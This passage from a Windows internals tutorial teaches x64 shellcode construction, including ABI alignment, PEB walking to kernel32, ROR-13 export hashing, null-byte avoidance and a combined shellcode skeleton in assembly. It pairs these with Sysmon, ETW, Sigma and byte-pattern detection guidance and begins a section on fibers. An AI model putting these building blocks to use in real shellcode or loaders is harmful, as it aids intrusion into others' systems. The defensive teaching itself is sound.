Skip the shadow allocation and the first thing the callee does (often a mov [rsp+8], rcx early in a Win32 prologue) overwrites whatever sits just above the return address: your own locals, saved registers, or the return address of the frame that called your shellcode.
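The slot arithmetic in the layout table reduces to one multiplication, which is handy when reading a disassembly and mapping [rsp+N] references back to arguments. The helpers below are a hypothetical sketch of that mapping, covering both the callee's view on entry and the caller's view just before the call.

```python
# Sketch: map a 1-based argument number to its stack slot in the Microsoft x64 ABI.
# Arguments 1-4 map to their shadow (home) slots; 5+ are real stack arguments.
SLOT = 8  # every slot is 8 bytes wide

def arg_offset_on_entry(n):
    """Offset from RSP at callee entry (the return address occupies [RSP+0])."""
    if n < 1:
        raise ValueError("argument numbers are 1-based")
    return SLOT * n

def arg_offset_before_call(n):
    """Offset from RSP in the caller, just before the call pushes the return address."""
    if n < 1:
        raise ValueError("argument numbers are 1-based")
    return SLOT * (n - 1)

if __name__ == "__main__":
    for n in range(1, 7):
        print(f"arg {n}: callee [rsp+{arg_offset_on_entry(n):#x}], "
              f"caller [rsp+{arg_offset_before_call(n):#x}]")
```

The 8-byte difference between the two views is the return address pushed by call.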

Stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention. — The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

0x20 (32 bytes) for shadow space.
+ 0x08 to undo the misalignment the preceding call introduced.

; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x20                  ; shadow space only: RSP is already aligned here, so
                               ; an extra 8 would misalign it at the next call

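To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, the preceding stack adjustment is off by 8: either the + 0x08 was omitted in a frame entered by call, or it was added on top of an explicit and rsp alignment.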
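Alignment bugs of this kind can be reasoned about with nothing more than RSP modulo 16. The sketch below tracks that value through a short list of stack operations; the operation names and the function are invented for illustration and do not model anything beyond the arithmetic.

```python
# Sketch: track RSP modulo 16 through a sequence of stack adjustments.
# A result of 0 means RSP is 16-byte aligned at the point of the next call.

def rsp_mod16_at_call(entry_mod16, ops):
    """Apply ('sub'|'add', n), ('push', None), ('pop', None), ('and16', None) steps."""
    rsp = entry_mod16 % 16
    for op, value in ops:
        if op == "sub":
            rsp = (rsp - value) % 16
        elif op == "add":
            rsp = (rsp + value) % 16
        elif op == "push":
            rsp = (rsp - 8) % 16
        elif op == "pop":
            rsp = (rsp + 8) % 16
        elif op == "and16":          # and rsp, -16
            rsp = 0
        else:
            raise ValueError(f"unknown op: {op}")
    return rsp

if __name__ == "__main__":
    cases = {
        "entered by call, sub 0x28":  (8, [("sub", 0x28)]),
        "entered by call, sub 0x20":  (8, [("sub", 0x20)]),
        "and rsp,-16 then sub 0x20":  (8, [("and16", None), ("sub", 0x20)]),
        "and rsp,-16 then sub 0x28":  (8, [("and16", None), ("sub", 0x28)]),
    }
    for label, (entry, ops) in cases.items():
        mod = rsp_mod16_at_call(entry, ops)
        print(f"{label:<28} -> rsp % 16 = {mod} ({'ok' if mod == 0 else 'MISALIGNED'})")
```

The model shows that 0x28 is right for a frame entered by call, while 0x20 is right after an explicit and rsp, -16; mixing the two leaves RSP off by 8.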

5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
call/pop delta trick. A call to the next instruction pushes its return address — the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = runtime address of get_rip (this instruction)
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).

6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

Step	Source	Field	Offset (x64)
1	`GS` segment	→ `TEB`	—
2	`TEB`	`ProcessEnvironmentBlock`	`+0x060`
3	`PEB`	`Ldr` → `PEB_LDR_DATA`	`+0x018`
4	`PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x020`
5	`LDR_DATA_TABLE_ENTRY` link	`InMemoryOrderLinks.Flink`	`+0x000`
6	`LDR_DATA_TABLE_ENTRY`	`DllBase` (measured from `InMemoryOrderLinks`; `+0x030` from the entry start)	`+0x020`

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the first entry reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience (the order is a loader convention, not a documented guarantee) and because some EDRs reportedly permute the head of the list as a tripwire (see §10).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x20]     ; DllBase: +0x30 in the entry, minus 0x10 for InMemoryOrderLinks
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32

Flow diagram tracing the PEB walk from GS register through PEB_LDR_DATA and InMemoryOrderModuleList to locate kernel32.dll base address. — Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll’s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

Field	Offset
`e_lfanew` (RVA of PE header)	`DllBase + 0x3C`
Optional Header	`PE_header + 0x18`
Export Directory RVA (PE32+)	`OptHeader + 0x70`
`AddressOfFunctions`	`ExportDir + 0x1C`
`AddressOfNames`	`ExportDir + 0x20`
`AddressOfNameOrdinals`	`ExportDir + 0x24`
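The same offsets apply when an analyst parses a module statically, which is a convenient way to check them. The sketch below reads the export directory RVA from a byte buffer with `struct`; it handles both PE32 and PE32+ optional headers and is exercised on a synthetic header built by a hypothetical helper, `make_fake_pe32plus`, rather than on a real DLL.

```python
# Sketch: locate the Export Directory RVA in a PE image held as bytes.
# Offsets follow the table above; the synthetic header is for illustration only.
import struct

def export_directory_rva(image: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    opt_header = e_lfanew + 0x18                       # signature (4) + file header (20)
    magic = struct.unpack_from("<H", image, opt_header)[0]
    if magic == 0x20B:                                 # PE32+
        data_directory = opt_header + 0x70
    elif magic == 0x10B:                               # PE32
        data_directory = opt_header + 0x60
    else:
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    return struct.unpack_from("<I", image, data_directory)[0]

def make_fake_pe32plus(export_rva: int, e_lfanew: int = 0x80) -> bytes:
    """Build just enough of a PE32+ header to exercise the parser."""
    buf = bytearray(e_lfanew + 0x18 + 0x78)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    struct.pack_into("<H", buf, e_lfanew + 0x18, 0x20B)
    struct.pack_into("<I", buf, e_lfanew + 0x88, export_rva)
    return bytes(buf)

if __name__ == "__main__":
    print(hex(export_directory_rva(make_fake_pe32plus(0x12345))))
```

The 0x88 that appears in the assembly is simply 0x18 + 0x70; for a 32-bit image the corresponding offset from the PE signature would be 0x78.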

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx r11d, byte [rsi]       ; scratch register: rax must keep the module base
    test  r11b, r11b
    jz    .check
    ror   edi, 13
    add   edi, r11d
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard, which is precisely why defenders now key on it (see §10).

8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem	Fix
`mov rax, 0x000000007FFE1234` → nulls	`mov eax, 0x7FFE1234` (the 32-bit write zero-extends into `RAX`)
64-bit literal in `mov r9, imm64`	`lea r9, [rel label]` or build via shifts/ORs
`push 0` → encodes `6A 00`	`xor ecx, ecx` ; `push rcx`
`mov rcx, 0` → 7-byte encoding with four nulls	`xor ecx, ecx`

; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234 in its imm64 form
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: write the 32-bit sub-register, which zero-extends into RAX
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234 (no preceding xor needed)
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX, so the xor eax, eax above is redundant and is shown only to make the zero-extension explicit. This single architectural behaviour eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.

9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x28                ; shadow space + alignment

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x20]        ; r15 = kernel32 base (DllBase is entry+0x30; rbx points at entry+0x10)

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x28
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret

Every block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, DllBase at offset 0x30 of the LDR entry (that is, 0x20 past the InMemoryOrderLinks field that rbx points at), lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.

10. Common Attacker Techniques

Technique	Description
PEB-walk API resolution	Locate `kernel32.dll` via `gs:[0x60]` chain, parse exports by hash
ROR-13 export hashing	Avoid embedded API name strings; survive static signature scans
RIP-relative PIC	`lea reg, [rel label]` to address embedded data without fixups
Sub-register zero-extension	`mov eax, imm32` to write `RAX` with no null bytes
Shadow-space-aware call wrapping	`sub rsp, 0x28` around every Win32 call from an unknown caller
Direct Win32 → Native API substitution	Call `Nt*` syscalls to bypass usermode hooks (`T1106`)
Reflective loading of a PE in memory	Shellcode bootstraps a full PE image without touching disk (`T1620`)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

EventID 1 — Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
EventID 8 — CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
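EventID 10 — ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (PROCESS_ALL_ACCESS) and 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, the mask commonly associated with credential dumping). Injection itself needs PROCESS_VM_WRITE (0x0020) together with PROCESS_VM_OPERATION (0x0008).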
EventID 17 / 18 — Pipe creation/connection, frequently used by shellcode-launched implants for C2.
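When triaging EventID 10 records it helps to expand the GrantedAccess mask into named rights rather than memorising hex values. The following is a minimal sketch using the documented process access-right bit values; the function names `decode_access` and `allows_remote_write` are illustrative, and the table covers only the rights most relevant to injection triage.

```python
# Subset of the documented Windows process access rights.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Writing into another process needs both of these rights.
REMOTE_WRITE_BITS = 0x0008 | 0x0020


def _to_int(mask):
    """Accept either an int or a Sysmon-style hex string such as '0x1010'."""
    return int(mask, 16) if isinstance(mask, str) else mask


def decode_access(mask):
    """Return the names of the known rights present in the mask."""
    value = _to_int(mask)
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]


def allows_remote_write(mask):
    """True when the handle could be used to write into the target."""
    return (_to_int(mask) & REMOTE_WRITE_BITS) == REMOTE_WRITE_BITS


if __name__ == "__main__":
    for sample in ("0x1FFFFF", "0x1410", "0x1010"):
        print(sample, decode_access(sample), allows_remote_write(sample))
```

Separating read-only masks from write-capable ones in this way keeps credential-access hunting and injection hunting from being conflated in a single alert.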

ETW providers worth subscribing to in EDR pipelines:

Microsoft-Windows-Kernel-Process — kernel-side process/thread/image events.
Microsoft-Windows-Threat-Intelligence (PPL-only) — reports NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, and NtCreateThreadEx activity from the kernel, so patching out user-mode hooks does not suppress it.
Microsoft-Windows-Security-Auditing — handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface comparable process-creation and object-access events in the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
ROR-13 hashing loops in memory scans.
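The last two signals can be prototyped as a simple byte-pattern sweep over a dumped memory region. The sketch below is an assumption-laden starting point rather than a production signature: it matches any 64-bit register load from gs:[0x60] (the byte string quoted above is the RAX form) and any `ror r32, 13` encoding. The pattern names and the `scan` helper are illustrative, and either pattern alone will produce false positives, so hits should be correlated with the unbacked-memory signals.

```python
import re

# mov r64, gs:[0x60]: GS prefix, REX.W (optionally REX.WR), 8B /r with SIB, disp32.
PEB_READ = re.compile(
    rb"\x65[\x48\x4C]\x8B[\x04\x0C\x14\x1C\x24\x2C\x34\x3C]\x25\x60\x00\x00\x00"
)

# ror r32, 13: C1 /1 ib with imm8 = 0x0D, optionally REX.B-prefixed for r8d-r15d.
ROR13 = re.compile(rb"\x41?\xC1[\xC8-\xCF]\x0D")

PATTERNS = (("peb_read", PEB_READ), ("ror13", ROR13))


def scan(buf):
    """Return a sorted list of (offset, label) for every pattern hit in buf."""
    hits = []
    for label, pattern in PATTERNS:
        hits.extend((m.start(), label) for m in pattern.finditer(buf))
    return sorted(hits)


if __name__ == "__main__":
    sample = b"\x90" + bytes.fromhex("65488B042560000000") + b"\x90" + bytes.fromhex("C1CF0D")
    for offset, label in scan(sample):
        print(f"{offset:#06x}  {label}")
```

A region that contains both hits and is private, executable, and not image-backed is a far stronger lead than either byte pattern on its own.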

Sigma sketch — suspicious cross-process access typical of shellcode injection:

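title: Suspicious Cross-Process Access With Full or Memory-Read Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'   # PROCESS_ALL_ACCESS (includes VM_WRITE and VM_OPERATION)
      - '0x1410'     # QUERY_LIMITED_INFORMATION | QUERY_INFORMATION | VM_READ
      - '0x1010'     # QUERY_LIMITED_INFORMATION | VM_READ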
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high

Hardening to deploy on monitored endpoints:

Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.

12. Tools for x64 Shellcode Analysis

Tool	Description	Link
NASM	Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection	`nasm.us`
Keystone Engine	Programmatic assembler (Python bindings) for bad-character analysis labs	`keystone-engine.org`
x64dbg	User-mode debugger; trace shellcode through `gs:[0x60]` and EAT walks	`x64dbg.com`
WinDbg	Inspect `_TEB`, `_PEB`, `_PEB_LDR_DATA`, `_LDR_DATA_TABLE_ENTRY` on the target build	`learn.microsoft.com`
Ghidra / IDA	Static analysis of shellcode-bearing samples and reflective loader stubs	`ghidra-sre.org`
Volatility 3	Memory forensics: enumerate suspicious `MEM_PRIVATE` + `RX` regions, hunt unbacked threads	`volatilityfoundation.org`
Process Hacker	Live triage of thread start addresses and memory protections	`processhacker.sourceforge.io`
Godbolt Compiler Explorer	Inspect MSVC-emitted x64 prologues to confirm ABI assumptions	`godbolt.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection (umbrella)	`T1055`	Sysmon `EventID 8` + `EventID 10` with VM-write `GrantedAccess`
DLL Injection	`T1055.001`	Image Load (`EventID 7`) of unsigned DLLs or DLLs loaded from user-writable paths
Portable Executable Injection	`T1055.002`	Volatility scans for PE headers in `MEM_PRIVATE` `RX` regions
APC Injection	`T1055.004`	ETW Ti `NtQueueApcThread` to a remote thread; alert on APC routines or thread start addresses in unbacked memory
Process Hollowing	`T1055.012`	`EventID 1` with suspended child, followed by `EventID 10` write + resume
Native API	`T1106`	ETW Ti syscall provider; direct `Nt*` calls outside `ntdll`
Obfuscated Files or Information	`T1027`	YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code Loading	`T1620`	Unbacked `RX` memory with PE magic / no module image record

Summary

x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
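The PEB is reached via gs:[0x60] on x64 (the TEB itself sits at the GS base). The offsets used in the walk (Ldr at +0x18, InMemoryOrderModuleList at +0x20, and DllBase at +0x30 of the LDR entry, which is +0x20 from its InMemoryOrderLinks field) differ from the x86 layout and must be verified against the target build.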
Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

Fibers: User-Mode Cooperative Threads

Objective: Understand the internals of Windows fibers — how they relate to the TEB, the undocumented FIBER structure, Fiber Local Storage, and the cooperative context switch performed entirely in user mode — so defenders can recognize and detect adversarial use of fiber APIs for stealthy in-process execution.

1. Cooperative vs. Preemptive Scheduling

A thread is the Windows kernel’s unit of execution. The scheduler picks ready threads, slices CPU time, and preempts them at quantum boundaries — all driven from ntoskrnl.exe. A fiber is different: it is a unit of execution that the kernel does not know about. Fibers run inside threads, and the application — not the OS — chooses when one fiber yields and another runs.

Two consequences follow immediately:

A fiber switch never crosses the user/kernel boundary. No syscall is issued. SwitchToFiber lives in KernelBase.dll and returns without touching ntoskrnl.
From the kernel’s perspective, all activity performed by a fiber is attributed to the thread that runs it. Accessing TLS from a fiber accesses the thread’s TLS, not a per-fiber slot.

This is the root of both the elegance and the security relevance of fibers: they are coroutines built directly into the Win32 ABI, with stack pivots and register saves the kernel cannot see.

2. The Fiber Execution Model

A fiber consists of three things: a stack, a saved CPU context (registers, instruction pointer, SEH frame), and a start routine that receives an opaque parameter. A thread becomes “fiber-aware” by calling ConvertThreadToFiber, at which point that thread remains a fiber host until it calls ConvertFiberToThread.

Rule	Behavior
Must convert first	You cannot call `SwitchToFiber` from a thread until `ConvertThreadToFiber` runs.
Fiber function returning	If a fiber’s start routine returns, the host thread calls `ExitThread` and terminates.
Self-delete	If the currently running fiber calls `DeleteFiber` on itself, the host thread exits.
Cross-thread delete	Deleting a fiber that is the selected fiber of another thread will likely crash that thread — its stack just disappeared.
Cross-thread switch	`SwitchToFiber` accepts a fiber created by a different thread; the caller becomes the new host.

These rules are load-bearing — most fiber bugs (and several known abuse primitives) come from violating them.

3. TEB Layout and the FIBER Structure

The Thread Environment Block (TEB) tracks the per-thread fiber state. Three fields matter:

Field	Type	Role
`NtTib.FiberData`	`PVOID`	Pointer to the current fiber’s `FIBER` structure
`HasFiberData`	`USHORT : 1`	Bitfield set by `ConvertThreadToFiberEx`; indicates the thread hosts fibers
`FlsData`	`PVOID`	Pointer to the FLS slot array for the current fiber

ConvertThreadToFiberEx calls NtCurrentTeb(), checks Teb->HasFiberData, and if the thread is already a fiber returns NULL with the last error set to ERROR_ALREADY_FIBER. Otherwise it allocates a FIBER structure on the process heap via RtlAllocateHeap and stores its address in NtTib.FiberData.

The FIBER struct itself is not officially documented. The shape below is reconstructed from ReactOS sources and public symbols and is subject to change across Windows versions:

// Reconstructed from public symbols / ReactOS — illustrative only.
typedef struct _FIBER {
    PVOID    FiberData;          // lpParameter passed at creation
    PVOID    ExceptionList;      // Top of SEH chain (NT_TIB.ExceptionList)
    PVOID    StackBase;          // High end of the fiber stack
    PVOID    StackLimit;         // Low end (guard page)
    PVOID    DeallocationStack;  // Original VirtualAlloc base
    CONTEXT  FiberContext;       // Saved CPU state: RIP, RSP, RBP, RBX, ...
    ULONG    FiberFlags;         // FIBER_FLAG_FLOAT_SWITCH, etc.
    PVOID    ActivationContext;  // Per-fiber activation context stack
    PVOID    FlsSlots;           // Per-fiber FLS slot array
} FIBER, *PFIBER;

You must never read or write this structure directly. The Win32 fiber functions manage its contents; treating the returned LPVOID as opaque is part of the contract.

4. The Core Fiber API

The full surface is small. The fiber-related declarations in winbase.h and fibersapi.h boil down to these functions:

Function	Purpose
`ConvertThreadToFiber`	Promote the calling thread into a fiber; required first
`ConvertThreadToFiberEx`	As above; accepts `FIBER_FLAG_FLOAT_SWITCH`
`CreateFiber`	Allocate stack + `FIBER` struct; record entry point and parameter
`CreateFiberEx`	As above; accepts `dwStackCommitSize` and flags
`SwitchToFiber`	Cooperative context switch to the supplied fiber
`DeleteFiber`	Free the fiber’s stack, context, and `FIBER` data
`ConvertFiberToThread`	Demote back to a plain thread; required to avoid leaks
`GetCurrentFiber`	Returns the current `FIBER` address (intrinsic — no `CALL`)
`GetFiberData`	Returns the `lpParameter` value (intrinsic — no `CALL`)

The exact CreateFiber signature, per MSDN:

LPVOID CreateFiber(
    SIZE_T                dwStackSize,    // 0 = default, grows up to 1 MB
    LPFIBER_START_ROUTINE lpStartAddress, // void StartRoutine(LPVOID lpParameter)
    LPVOID                lpParameter     // passed to the fiber function
);

GetCurrentFiber and GetFiberData are compiler intrinsics on MSVC — they inline directly to a gs:[0x20]/fs:[0x10] read of NtTib.FiberData. They produce no import thunk and no CALL instruction, which has direct consequences for IAT-based detection.

5. Fiber Lifecycle: A Minimal Example

This walks the canonical create → switch → yield → delete sequence. Note how g_mainFiber is the fiber identity of the original thread, returned by ConvertThreadToFiber.

#include <windows.h>
#include <stdio.h>

LPVOID g_mainFiber  = NULL;
LPVOID g_workFiber  = NULL;

VOID CALLBACK WorkerFiberProc(LPVOID lpParam) {
    printf("[worker] running on fiber %p, param=%p\n",
           GetCurrentFiber(), lpParam);

    // Cooperative yield — control returns to the main fiber.
    SwitchToFiber(g_mainFiber);

    printf("[worker] resumed; returning will ExitThread()\n");
    SwitchToFiber(g_mainFiber);   // never let the routine return
}

int main(void) {
    // Promote thread; TEB->HasFiberData becomes 1.
    g_mainFiber = ConvertThreadToFiber(NULL);
    if (g_mainFiber == NULL) {
        fprintf(stderr, "ConvertThreadToFiber failed: %lu\n", GetLastError());
        return 1;
    }

    // 64 KiB stack; entry = WorkerFiberProc; param = 0xDEADBEEF.
    g_workFiber = CreateFiber(0x10000, WorkerFiberProc,
                              (LPVOID)(ULONG_PTR)0xDEADBEEF);
    if (g_workFiber == NULL) {
        fprintf(stderr, "CreateFiber failed: %lu\n", GetLastError());
        ConvertFiberToThread();
        return 1;
    }

    SwitchToFiber(g_workFiber);   // first run of worker
    printf("[main] back from worker\n");
    SwitchToFiber(g_workFiber);   // resume worker

    DeleteFiber(g_workFiber);     // safe: not the running fiber
    ConvertFiberToThread();       // demote; release fiber bookkeeping
    return 0;
}

Forgetting ConvertFiberToThread leaks the main fiber’s FIBER allocation on the process heap. Forgetting to yield back before the worker returns terminates the host thread via ExitThread.

6. Context Switching Internals

SwitchToFiber is the heart of the API. Conceptually, it performs:

Save the current CPU state (RBX, RBP, RDI, RSI, R12–R15, RSP, RIP on x64) into the current fiber’s FiberContext.
Save the SEH chain head (NtTib.ExceptionList) and stack bounds (StackBase, StackLimit) into the current FIBER.
If FIBER_FLAG_FLOAT_SWITCH is set, save the XMM/MMX/x87 state.
Update NtTib.FiberData to point at the target FIBER.
Restore the target fiber’s stack bounds, SEH chain, FLS pointer, and CPU registers.
Return to the saved instruction pointer of the target — execution resumes there on the target’s stack.

Critically, this is a pure user-mode operation. No syscall, no int 2e, no ETW event from Microsoft-Windows-Kernel-Process. The host thread’s kernel-visible state (KTHREAD, ETHREAD) is unchanged; only RIP/RSP move from the kernel’s view.

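; Conceptual sketch of SwitchToFiber on x64 (pseudo-assembly, not real disassembly)
; rcx = target FIBER
mov     rax, gs:[0x20]                      ; rax = current FIBER (NtTib.FiberData)
mov     [rax + FiberContextOff + Rsp], rsp  ; save the outgoing stack pointer
mov     [rax + FiberContextOff + Rip], <return addr>
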